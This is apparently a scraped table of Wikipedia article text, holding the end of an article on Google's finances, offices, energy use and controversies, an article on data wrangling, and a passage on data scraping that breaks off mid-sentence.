company reported $10.492 billion in total advertising revenues and only $112 million in licensing and other revenues. 206 In 2011, 96% of Google's revenue was derived from its advertising programs. 207 Google generated $50 billion in annual revenue for the first time in 2012, generating $38 billion the previous year. In January 2013, then-CEO Larry Page commented, "We ended 2012 with a strong quarter ... Revenues were up 36% year-on-year, and 8% quarter-on-quarter. And we hit $50 billion in revenues for the first time last year not a bad achievement in just a decade and a half. 208 Google's consolidated revenue for the third quarter of 2013 was reported in mid-October 2013 as $14.89 billion, a 12 percent increase compared to the previous quarter. 209 Google's Internet business was responsible for $10.8 billion of this total, with an increase in the number of users' clicks on advertisements. 210 By January 2014, Google's market capitalization had grown to $397 billion. 211 Google uses various tax avoidance strategies. On the list of largest technology companies by revenue, it pays the lowest taxes to the countries of origin of its revenues. Google between 2007 and 2010 saved $3.1 billion in taxes by shuttling non-U.S. profits through Ireland and the Netherlands and then to Bermuda. Such techniques lower its non-U.S. tax rate to 2.3 per cent, while normally the corporate tax rate in, for instance, the UK is 28 per cent. 212 This reportedly sparked a French investigation into Google's transfer pricing practices in 2012. 213 In 2020, Google said it had overhauled its controversial global tax structure and consolidated all of its intellectual property holdings back to the US. 214 Google Vice-president Matt Brittin testified to the Public Accounts Committee of the UK House of Commons that his UK sales team made no sales and hence owed no sales taxes to the UK. 215 In January 2016, Google reached a settlement with the UK to pay 130m in back taxes plus higher taxes in future. 216 In 2017, Google channeled $22.7 billion from the Netherlands to Bermuda to reduce its tax bill. 217 In 2013, Google ranked 5th in lobbying spending, up from 213th in 2003. In 2012, the company ranked 2nd in campaign donations of technology and Internet sections. 218 The name "Google" originated from a misspelling of "googol", 219 220 which refers to the number represented by a 1 followed by one-hundred zeros. Page and Brin write in their original paper on PageRank: 35 "We chose our system name, Google, because it is a common spelling of googol, or 10100 , and fits well with our goal of building very large-scale search engines. Having found its way increasingly into everyday language, the verb "google" was added to the Merriam Webster Collegiate Dictionary and the Oxford English Dictionary in 2006, meaning "to use the Google search engine to obtain information on the Internet. 221 222 Google's mission statement, from the outset, was "to organize the world's information and make it universally accessible and useful", 223 and its unofficial slogan is "Don't be evil". 224 In October 2015, a related motto was adopted in the Alphabet corporate code of conduct by the phrase: "Do the right thing". 225 The original motto was retained in the code of conduct of Google, now a subsidiary of Alphabet. The original Google logo was designed by Sergey Brin. 226 Since 1998, update Google has been designing special, temporary alternate logos to place on their homepage intended to celebrate holidays, events, achievements and people. The first Google Doodle was in honor of the Burning Man Festival of 1998. 227 228 The doodle was designed by Larry Page and Sergey Brin to notify users of their absence in case the servers crashed. Subsequent Google Doodles were designed by an outside contractor, until Larry and Sergey asked then-intern Dennis Hwang to design a logo for Bastille Day in 2000. From that point onward, Doodles have been organized and created by a team of employees termed "Doodlers". 229 Google has a tradition of creating April Fools' Day jokes. Its first on April 1, 2000, was Google MentalPlex which allegedly featured the use of mental power to search the web. 230 In 2007, Google announced a free Internet service called TiSP, or Toilet Internet Service Provider, where one obtained a connection by flushing one end of a fiber-optic cable down their toilet. 231 Google's services contain easter eggs, such as the Swedish Chef's "Bork bork bork, Pig Latin, "Hacker" or leetspeak, Elmer Fudd, Pirate, and Klingon as language selections for its search engine. 232 When searching for the word "anagram, meaning a rearrangement of letters from one word to form other valid words, Google's suggestion feature displays "Did you mean: nag a ram? 233 Since 2019, Google runs free online courses to help engineers learn how to plan and author technical documentation better. 234 On Fortune magazine's list of the best companies to work for, Google ranked first in 2007, 2008 and 2012, 235 236 237 and fourth in 2009 and 2010. 238 239 Google was also nominated in 2010 to be the world's most attractive employer to graduating students in the Universum Communications talent attraction index. 240 Google's corporate philosophy includes principles such as "you can make money without doing evil, "you can be serious without a suit, and "work should be challenging and the challenge should be fun. 241 As of September 30, 2020, update Alphabet Inc. had 132,121 employees, 242 of which more than 100,000 worked for Google. 8 Google's 2020 update diversity report states that 32 percent of its workforce are women and 68 percent are men, with the ethnicity of its workforce being predominantly white (51.7%) and Asian (41.9%). 243 Within tech roles, 23.6 percent were women; and 26.7 percent of leadership roles were held by women. 244 In addition to its 100,000 full-time employees, Google used about 121,000 temporary workers and contractors, as of March 2019. update 8 Google's employees are hired based on a hierarchical system. Employees are split into six hierarchies based on experience and can range "from entry-level data center workers at level one to managers and experienced engineers at level six. 245 As a motivation technique, Google uses a policy known as Innovation Time Off, where Google engineers are encouraged to spend 20% of their work time on projects that interest them. Some of Google's services, such as Gmail, Google News, Orkut, and AdSense, originated from these independent endeavors. 246 In a talk at Stanford University, Marissa Mayer, Google's vice-president of Search Products and User Experience until July 2012, showed that half of all new product launches in the second half of 2005 had originated from the Innovation Time Off. 247 In 2005, articles in The New York Times 248 and other sources began suggesting that Google had lost its anti-corporate, no evil philosophy. 249 250 251 In an effort to maintain the company's unique culture, Google designated a Chief Culture Officer whose purpose was to develop and maintain the culture and work on ways to keep true to the core values that the company was founded on. 252 Google has also faced allegations of sexism and ageism from former employees. 253 254 In 2013, a class action against several Silicon Valley companies, including Google, was filed for alleged "no cold call" agreements which restrained the recruitment of high-tech employees. 255 In a lawsuit filed January 8, 2018, multiple employees and job applicants alleged Google discriminated against a class defined by their "conservative political views , male gender , and or ... Caucasian or Asian race". 256 On January 25, 2020, the formation of an international workers union of Google employees, Alpha Global, was announced. 257 The coalition is made up of "13 different unions representing workers in 10 countries, including the United States, the United Kingdom, and Switzerland. 258 The group is affiliated with the UNI Global Union, which represents nearly 20 million international workers from various unions and federations. The formation of the union is in response to persistent allegations of mistreatment of Google employees and a toxic workplace culture. 258 259 256 Google had previously been accused of surveilling and firing employees who were suspected of organizing a workers union. 260 In 2021, court documents revealed that between 2018 and 2020, Google ran an anti-union campaign called Project Vivian to "convince them (employees) that unions suck". 261 Google's headquarters in Mountain View, California is referred to as "the Googleplex", a play on words on the number googolplex and the headquarters itself being a complex of buildings. Internationally, Google has over 78 offices in more than 50 countries. 262 In 2006, Google moved into about 300,000 square feet (27,900 m2) of office space at 111 Eighth Avenue in Manhattan, New York City. The office houses its largest advertising sales team. 263 In 2010, Google bought the building housing the headquarter, in a deal that valued the property at around $1.9 billion. 264 265 In March 2018, Google's parent company Alphabet bought the nearby Chelsea Market building for $2.4 billion. The sale is touted as one of the most expensive real estate transactions for a single building in the history of New York. 266 267 268 269 In November 2018, Google announced its plan to expand its New York City office to a capacity of 12,000 employees. 270 The same December, it was announced that a $1 billion, 1,700,000 square-foot (160,000 m2) headquarters for Google would be built in Manhattan's Hudson Square neighborhood. 271 272 Called Google Hudson Square, the new campus is projected to more than double the number of Google employees working in New York City. 273 By late 2006, Google established a new headquarters for its AdWords division in Ann Arbor, Michigan. 274 In November 2006, Google opened offices on Carnegie Mellon's campus in Pittsburgh, focusing on shopping-related advertisement coding and smartphone applications and programs. 275 276 Other office locations in the U.S. include Atlanta, Georgia; Austin, Texas; Boulder, Colorado; Cambridge, Massachusetts; San Francisco, California; Seattle, Washington; Kirkland, Washington; Birmingham, Michigan; Reston, Virginia, Washington, D.C., 277 and Madison, Wisconsin. 278 It also has product research and development operations in cities around the world, namely Sydney (birthplace location of Google Maps) 279 and London (part of Android development). 280 In November 2013, Google announced plans for a new London headquarter, a 1 million square foot office able to accommodate 4,500 employees. Recognized as one of the biggest ever commercial property acquisitions at the time of the deal's announcement in January, 281 Google submitted plans for the new headquarter to the Camden Council in June 2017. 282 283 In May 2015, Google announced its intention to create its own campus in Hyderabad, India. The new campus, reported to be the company's largest outside the United States, will accommodate 13,000 employees. 284 285 Google's Global Offices sum a total of 85 Locations worldwide, 286 with 32 offices in North America, 3 of them in Canada and 29 in United States Territory, California being the state with the most Google's offices with 9 in total including the Googleplex. In the Latin America Region Google counts with 6 offices, in Europe 24 (3 of them in UK), the Asia Pacific region counts with 18 offices principally 4 in India and 3 in China, and the Africa Middle East region counts 5 offices. Google has data centers in North and South America, Asia, and Europe. 287 There is no official data on the number of servers in Google data centers; however, research and advisory firm Gartner estimated in a July 2016 report that Google at the time had 2.5 million servers. 288 Traditionally, Google relied on parallel computing on commodity hardware like mainstream x86 computers (similar to home PCs) to keep costs per query low. 289 290 291 In 2005, it started developing its own designs, which were only revealed in 2009. 291 Google has built its own private submarine communications cables. The first cable, named Curie, connects California with Chile and was completed on November 15, 2019. 292 293 The second fully Google-owned undersea cable, named Dunant, connects the United States with France and is planned to begin operation in 2020. 294 Google's third subsea cable, Equiano, will connect Lisbon, Portugal with Lagos, Nigeria and Cape Town, South Africa. 295 The company's fourth cable, named Grace Hopper, connects landing points in New York, US, Bude, UK and Bilbao, Spain, and is expected to become operational in 2022. 296 In October 2006, the company announced plans to install thousands of solar panels to provide up to 1.6 Megawatt of electricity, enough to satisfy approximately 30% of the campus' energy needs. 297 298 The system is the largest rooftop photovoltaic power station constructed on a U.S. corporate campus and one of the largest on any corporate site in the world. 297 Since 2007, update Google has aimed for carbon neutrality in regard to its operations. 299 In Spring 2009, Google hired a herd of 200 goats for a week from California Grazing to mow their lawn. It was apparently more eco-friendly. 300 Google disclosed in September 2011 that it "continuously uses enough electricity to power 200,000 homes", almost 260 million watts or about a quarter of the output of a nuclear power plant. Total carbon emissions for 2010 were just under 1.5 million metric tons, mostly due to fossil fuels that provide electricity for the data centers. Google said that 25 percent of its energy was supplied by renewable fuels in 2010. An average search uses only 0.3 watt-hours of electricity, so all global searches are only 12.5 million watts or 5% of the total electricity consumption by Google. 301 In 2010, Google Energy made its first investment in a renewable energy project, putting $38.8 million into two wind farms in North Dakota. The company announced the two locations will generate 169.5 megawatts of power, enough to supply 55,000 homes. 302 In February 2010, the Federal Energy Regulatory Commission granted Google an authorization to buy and sell energy at market rates. 303 The corporation exercised this authorization in September 2013 when it announced it would purchase all the electricity produced by the not-yet-built 240 megawatt Happy Hereford wind farm. 304 In July 2010, Google signed an agreement with an Iowa wind farm to buy 114 megawatts of power for 20 years. 305 In December 2016, Google announced that—starting in 2017—it would purchase enough renewable energy to match 100% of the energy usage of its data centers and offices. The commitment will make Google "the world's largest corporate buyer of renewable power, with commitments reaching 2.6 gigawatts (2,600 megawatts) of wind and solar energy". 306 307 308 In November 2017, Google bought 536 megawatts of wind power. The purchase made the firm reach 100% renewable energy. The wind energy comes from two power plants in South Dakota, one in Iowa and one in Oklahoma. 309 In September 2019, Google's chief executive announced plans for a $2 billion wind and solar investment, the biggest renewable energy deal in corporate history. This will grow their green energy profile by 40%, giving them an extra 1.6 gigawatt of clean energy, the company said. 310 In September 2020, Google announced it had retroactively offset all of its carbon emissions since the company's foundation in 1998. 311 It also stated that it is committed to operating its data centers and offices using only carbon-free energy by 2030. 312 In October 2020, the company pledged to make the packaging for its hardware products 100% plastic-free and 100% recyclable by 2025. It also said that all its final assembly manufacturing sites will achieve a UL 2799 Zero Waste to Landfill certification by 2022 by ensuring that the vast majority of waste from the manufacturing process is recycled instead of ending up in a landfill. 313 Google donates to climate change denial political groups including the State Policy Network and the Competitive Enterprise Institute. 314 315 The company also actively funds and profits from climate disinformation by monetizing ad spaces on most of the largest climate disinformation sites. 316 Google continued to monetize and profit from sites propagating climate disinformation even after the company updated their policy to prohibit placing their ads on similar sites. 317 In 2004, Google formed the not-for-profit philanthropic Google.org, with a start-up fund of $1 billion. 318 The mission of the organization is to create awareness about climate change, global public health, and global poverty. One of its first projects was to develop a viable plug-in hybrid electric vehicle that can attain 100 miles per gallon. Google hired Larry Brilliant as the program's executive director in 2004 319 and Megan Smith has since update replaced him as director. 320 In March 2007, in partnership with the Mathematical Sciences Research Institute (MSRI), Google hosted the first Julia Robinson Mathematics Festival at its headquarters in Mountain View. 321 In 2011, Google donated 1 million euros to International Mathematical Olympiad to support the next five annual International Mathematical Olympiads (2011 2015). 322 323 In July 2012, Google launched a "Legalize Love" campaign in support of gay rights. 324 In 2008, Google announced its "project 10100", which accepted ideas for how to help the community and then allowed Google users to vote on their favorites. 325 After two years of no update, during which many wondered what had happened to the program, 326 Google revealed the winners of the project, giving a total of ten million dollars to various ideas ranging from non-profit organizations that promote education to a website that intends to make all legal documents public and online. 327 Responding to the humanitarian crisis after the 2022 Russian invasion of Ukraine, Google announced a $15 million donation to support Ukrainian citizens. 328 The company also decided to transform its office in Warsaw into a help center for refugees. 329 Also in February 2022, Google announced a $100 million fund to expand skills training and job placement for low-income Americans, in conjunction with non-profits Year Up, Social Finance, and Merit America. 330 Google has had criticism over issues such as aggressive tax avoidance, 331 search neutrality, copyright, censorship of search results and content, 332 and privacy. 333 334 Other criticisms are alleged misuse and manipulation of search results, its use of other people's intellectual property, concerns that its compilation of data may violate people's privacy, and the energy consumption of its servers, as well as concerns over traditional business issues such as monopoly, restraint of trade, anti-competitive practices, and patent infringement. Google formerly complied with Internet censorship policies of the People's Republic of China, 335 enforced by means of filters colloquially known as "The Great Firewall of China", but no longer does so. As a result, all Google services except for Chinese Google Maps are blocked from access within mainland China without the aid of virtual private networks, proxy servers, or other similar technologies. In July 2018, Mozilla program manager Chris Peterson accused Google of intentionally slowing down YouTube performance on Firefox. 336 337 In August 2018, The Intercept reported that Google is developing for the People's Republic of China a censored version of its search engine (known as Dragonfly) "that will blacklist websites and search terms about human rights, democracy, religion, and peaceful protest". 338 339 However, the project had been withheld due to privacy concerns. 340 341 In 2019, a hub for critics of Google dedicated to abstaining from using Google products coalesced in the Reddit online community r degoogle. 342 The DeGoogle grassroots campaign continues to grow as privacy activists highlight information about Google products, and the associated incursion on personal privacy rights by the company. In April 2019, former Mozilla executive Jonathan Nightingale accused Google of intentionally and systematically sabotaging the Firefox browser over the past decade in order to boost adoption of Google Chrome. 343 In November 2019, the Office for Civil Rights of the United States Department of Health and Human Services began investigation into Project Nightingale, to assess whether the "mass collection of individuals' medical records" complied with HIPAA. 344 According to The Wall Street Journal, Google secretively began the project in 2018, with St. Louis-based healthcare company Ascension. 345 In a 2022 National Labor Relations Board ruling, court documents suggested that Google sponsored a secretive project—Project Vivian—to counsel its employees and to discourage them from forming unions. 346 Google reportedly paid Apple $22 billion in 2022 to maintain its position as the default search engine on Safari. This deal underscores the intense competition in the tech industry for dominance in the search market. It marks one of the largest payments between two tech giants in recent years. 347 On May 1, 2023, Google placed an ad against anti-disinformation Brazilian Congressional Bill No. 2630, which was about to be approved, on its search homepage in Brazil, calling on its users to ask congressional representatives to oppose the legislation. The country's government and judiciary accused the company of undue interference in the congressional debate, saying it could amount to abuse of economic power and ordering the company to change the ad within two hours of notification or face fines of R$1 million (2023) (US$185,528.76) per non-compliance hour. The company then promptly removed the ad. 348 349 In March 2024, a former Google software engineer and Chinese national, Linwei Ding, was accused of stealing confidential artificial intelligence information from the company and handing it to Chinese corporations. 350 Ding had allegedly stolen over 500 files from the company over the course of 5 years, having been hired in 2019. 351 Upon discovering Ding had been in contact with Chinese state-owned companies, Google notified the FBI, who carried on the investigation. 352 In May 2024, a misconfiguration in Google Cloud led to the accidental deletion of UniSuper's $135 billion Australian pension fund account, affecting over half a million members who were unable to access their accounts for a week. The outage, attributed to a cloud service error and not a cyberattack, prompted a joint apology from UniSuper and Google Cloud executives, who assured members that no personal data was compromised and restoration efforts were underway. 353 In August 2024, Google sent an email to users informing them of its legal obligation to disclose certain confidential information to U.S. government authorities. The company stated that when it receives valid requests from government agencies to produce documents without redacting confidential customer information, it may produce such documents even if they are confidential to users. However, it will request confidential treatment of such information from the government. 354 Google has aided controversial governments in mass surveillance projects, sharing with police and military the identities of those protesting racial injustice. In 2020, they shared with the FBI information collected from all Android users at a Black Lives Matter protest in Seattle, 355 including those who had opted out of location data collection. 356 357 Google is also part of Project Nimbus, a $1.2 billion deal in which the technology companies Google and Amazon will provide Israel and its military with artificial intelligence, machine learning, and other cloud computing services, including building local cloud sites that will "keep information within Israel's borders under strict security guidelines. 358 359 360 The contract has been criticized by shareholders as well as their employees over concerns that the project will lead to further abuses of Palestinians' human rights in the context of the ongoing illegal occupation and the Israeli Palestinian conflict. 361 362 Ariel Koren, a former marketing manager for Google's educational products and an outspoken critic of the project, wrote that Google "systematically silences Palestinian, Jewish, Arab and Muslim voices concerned about Google's complicity in violations of Palestinian human rights—to the point of formally retaliating against workers and creating an environment of fear", and said she was retaliated against for organizing against the project. 358 363 In March 2024, The New York Times reported that Google Photos was being used in a facial recognition program by Unit 8200, a surveillance unit of the Israeli Defense Forces, to surveil Palestinians in the Gaza Strip amid the Israel-Hamas War. A Google spokesman commented that the service is free and "does not provide identities for unknown people in photographs. 364 On April 18, 2024, Google dismissed 28 employees who participated in protests against the company's involvement in Project Nimbus, a $1.2 billion contract with the Israeli government to provide cloud computing and AI infrastructure, which the employees argued should not be used for military or intelligence services. The protesting employees, part of the group No Tech For Apartheid, staged sit-ins at Google's offices in New York and Sunnyvale, California, 365 leading to disruptions and blockages within the company facilities. 366 367 This had followed reports of Israeli forces killing large numbers of Palestinian civilians while using own Lavender AI system to identify targets. 368 369 On June 27, 2017, the company received a record fine of 2.42 billion from the European Union for "promoting its own shopping comparison service at the top of search results. 370 On July 18, 2018, 371 the European Commission fined Google 4.34 billion for breaching EU antitrust rules. The abuse of dominants position has been referred to as Google's constraint applied to Android device manufacturers and network operators to ensure that traffic on Android devices goes to the Google search engine. On October 9, 2018, Google confirmed 372 that it had appealed the fine to the General Court of the European Union. 373 On October 8, 2018, a class action lawsuit was filed against Google and Alphabet due to "non-public" Google account data being exposed as a result of a bug that allowed app developers to gain access to the private information of users. The litigation was settled in July 2020 for $7.5 million with a payout to claimants of at least $5 each, with a maximum of $12 each. 374 375 376 On March 20, 2019, the European Commission imposed a 1.49 billion ($1.69 billion) fine on Google for preventing rivals from being able to "compete and innovate fairly" in the online advertising market. European Union competition commissioner Margrethe Vestager said Google had violated EU antitrust rules by "imposing anti-competitive contractual restrictions on third-party websites" that required them to exclude search results from Google's rivals. 377 378 On September 14, 2022, Google lost the appeal of a 4.125 billion ( 3.5 billion) fine, which was ruled to be paid after it was proved by the European Commission that Google forced Android phone-makers to carry Google's search and web browser apps. Since the initial accusations, Google has changed its policy. 379 On January 21, 2019, French data regulator CNIL imposed a record 50 million fine on Google for breaching the European Union's General Data Protection Regulation. The judgment claimed Google had failed to sufficiently inform users of its methods for collecting data to personalize advertising. Google issued a statement saying it was "deeply committed" to transparency and was "studying the decision" before determining its response. 380 On January 6, 2022, France's data privacy regulatory body CNIL fined Alphabet's Google 150 million euros (US$169 million) for not allowing its Internet users an easy refusal of Cookies along with Facebook. 381 On March 20, 2024, Google was fined approximately $270 million by French regulators for using content from news outlets in France without proper disclosure to train its AI, Bard, now renamed Gemini, violating a previous commitment to negotiate content use transparently and fairly. 382 After U.S. Congressional hearings in July 2020, 383 and a report from the U.S. House of Representatives' Antitrust Subcommittee released in early October, 384 the United States Department of Justice filed an antitrust lawsuit against Google on October 20, 2020, asserting that it has illegally maintained its monopoly position in web search and search advertising. 385 386 The lawsuit alleged that Google engaged in anticompetitive behavior by paying Apple between $8 billion and $12 billion to be the default search engine on iPhones. 387 Later that month, both Facebook and Alphabet agreed to "cooperate and assist one another" in the face of investigation into their online advertising practices. 388 389 Another suit was brought against Google in 2023 for illegally monopolizing the advertising technology market. 390 In early June 2020, a $5 billion class-action lawsuit was filed against Google by a group of consumers, alleging that Chrome's Incognito browsing mode still collects their user history. 391 392 The lawsuit became known in March 2021 when a federal judge denied Google's request to dismiss the case, ruling that they must face the group's charges. 393 394 Reuters reported that the lawsuit alleged that Google's CEO Sundar Pichai sought to keep the users unaware of this issue. 395 In April 2024, it was announced that Google agreed to settle this lawsuit. Under the terms of the settlement Google agreed to destroy billions of data records to settle a lawsuit claiming it secretly tracked the internet use of people who thought they were browsing privately. 396 In 2017, three women sued Google, accusing the company of violating California's Equal Pay Act by underpaying its female employees. The lawsuit cited the wage gap was around $17,000 and that Google locked women into lower career tracks, leading to smaller salaries and bonuses. In June 2022, Google agreed to pay a $118 million settlement to 15,550 female employees working in California since 2013. As a part of the settlement, Google also agreed to hire a third party to analyze its hiring and compensation practices. 397 398 399 Following media reports about PRISM, the NSA's massive electronic surveillance program, in June 2013, several technology companies were identified as participants, including Google. 400 According to unnamed sources, Google joined the PRISM program in 2009, as YouTube in 2010. 401 Google has worked with the United States Department of Defense on drone software through the 2017 Project Maven that could be used to improve the accuracy of drone strikes. 402 In April 2018, thousands of Google employees, including senior engineers, signed a letter urging Google CEO Sundar Pichai to end this controversial contract with the Pentagon. 403 Google ultimately decided not to renew this DoD contract, which was set to expire in 2019. 404 |
161 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_munging | Data wrangling, sometimes referred to as data munging, is the process of transforming and mapping data from one "raw" data form into another format with the intent of making it more appropriate and valuable for a variety of downstream purposes such as analytics. The goal of data wrangling is to assure quality and useful data. Data analysts typically spend the majority of their time in the process of data wrangling compared to the actual analysis of the data. The process of data wrangling may include further munging, data visualization, data aggregation, training a statistical model, as well as many other potential uses. Data wrangling typically follows a set of general steps which begin with extracting the data in a raw form from the data source, "munging" the raw data (e.g. sorting) or parsing the data into predefined data structures, and finally depositing the resulting content into a data sink for storage and future use. 1 It is closely aligned with the ETL process. The "wrangler" non-technical term is often said to derive from work done by the United States Library of Congress's National Digital Information Infrastructure and Preservation Program (NDIIPP) and their program partner the Emory University Libraries based MetaArchive Partnership. The term "mung" has roots in munging as described in the Jargon File. 2 The term "data wrangler" was also suggested as the best analogy to describe someone working with data. 3 One of the first mentions of data wrangling in a scientific context was by Donald Cline during the NASA NOAA Cold Lands Processes Experiment. 4 Cline stated the data wranglers "coordinate the acquisition of the entire collection of the experiment data. Cline also specifies duties typically handled by a storage administrator for working with large amounts of data. This can occur in areas like major research projects and the making of films with a large amount of complex computer-generated imagery. In research, this involves both data transfer from research instrument to storage grid or storage facility as well as data manipulation for re-analysis via high-performance computing instruments or access via cyberinfrastructure-based digital libraries. With the upcoming of artificial intelligence in data science it has become increasingly important for automation of data wrangling to have very strict checks and balances, which is why the munging process of data has not been automated by machine learning. Data munging requires more than just an automated solution, it requires knowledge of what information should be removed and artificial intelligence is not to the point of understanding such things. 5 Data wrangling is a superset of data mining and requires processes that some data mining uses, but not always. The process of data mining is to find patterns within large data sets, where data wrangling transforms data in order to deliver insights about that data. Even though data wrangling is a superset of data mining does not mean that data mining does not use it, there are many use cases for data wrangling in data mining. Data wrangling can benefit data mining by removing data that does not benefit the overall set, or is not formatted properly, which will yield better results for the overall data mining process. An example of data mining that is closely related to data wrangling is ignoring data from a set that is not connected to the goal: say there is a data set related to the state of Texas and the goal is to get statistics on the residents of Houston, the data in the set related to the residents of Dallas is not useful to the overall set and can be removed before processing to improve the efficiency of the data mining process. With an increase of raw data comes an increase in the amount of data that is not inherently useful, this increases time spent on cleaning and organizing data before it can be analyzed which is where data wrangling comes into play. The result of data wrangling can provide important metadata statistics for further insights about the data, it is important to ensure metadata is consistent otherwise it can cause roadblocks. Data wrangling allows analysts to analyze more complex data more quickly, achieve more accurate results, and because of this better decisions can be made. Many businesses have moved to data wrangling because of the success that it has brought. The main steps in data wrangling are as follows: This all-encompassing term describes how to understand your data. This is the first step to familiarize yourself with your data. These steps are an iterative process that should yield a clean and usable data set that can then be used for analysis. This process is tedious but rewarding as it allows analysts to get the information they need out of a large set of data that would otherwise be unreadable. The result of using the data wrangling process on this small data set shows a significantly easier data set to read. All names are now formatted the same way, first name last name , phone numbers are also formatted the same way area code-XXX-XXXX , dates are formatted numerically YYYY-mm-dd , and states are no longer abbreviated. The entry for Jacob Alan did not have fully formed data (the area code on the phone number is missing and the birth date had no year), so it was discarded from the data set. Now that the resulting data set is cleaned and readable, it is ready to be either deployed or evaluated. The data transformations are typically applied to distinct entities (e.g. fields, rows, columns, data values, etc.) within a data set, and could include such actions as extractions, parsing, joining, standardizing, augmenting, cleansing, consolidating, and filtering to create desired wrangling outputs that can be leveraged downstream. The recipients could be individuals, such as data architects or data scientists who will investigate the data further, business users who will consume the data directly in reports, or systems that will further process the data and write it into targets such as data warehouses, data lakes, or downstream applications. Depending on the amount and format of the incoming data, data wrangling has traditionally been performed manually (e.g. via spreadsheets such as Excel), tools like KNIME or via scripts in languages such as Python or SQL. R, a language often used in data mining and statistical data analysis, is now also sometimes used for data wrangling. 6 Data wranglers typically have skills sets within: R or Python, SQL, PHP, Scala, and more languages typically used for analyzing data. Visual data wrangling systems were developed to make data wrangling accessible for non-programmers, and simpler for programmers. Some of these also include embedded AI recommenders and programming by example facilities to provide user assistance, and program synthesis techniques to autogenerate scalable dataflow code. Early prototypes of visual data wrangling tools include OpenRefine and the Stanford Berkeley Wrangler research system; 7 the latter evolved into Trifacta. Other terms for these processes have included data franchising, 8 data preparation, and data munging. Given a set of data that contains information on medical patients your goal is to find correlation for a disease. Before you can start iterating through the data ensure that you have an understanding of the result, are you looking for patients who have the disease? Are there other diseases that can be the cause? Once an understanding of the outcome is achieved then the data wrangling process can begin. Start by determining the structure of the outcome, what is important to understand the disease diagnosis. Once a final structure is determined, clean the data by removing any data points that are not helpful or are malformed, this could include patients that have not been diagnosed with any disease. After cleaning look at the data again, is there anything that can be added to the data set that is already known that would benefit it? An example could be most common diseases in the area, America and India are very different when it comes to most common diseases. Now comes the validation step, determine validation rules for which data points need to be checked for validity, this could include date of birth or checking for specific diseases. After the validation step the data should now be organized and prepared for either deployment or evaluation. This process can be beneficial for determining correlations for disease diagnosis as it will reduce the vast amount of data into something that can be easily analyzed for an accurate result. |
162 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-4 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be 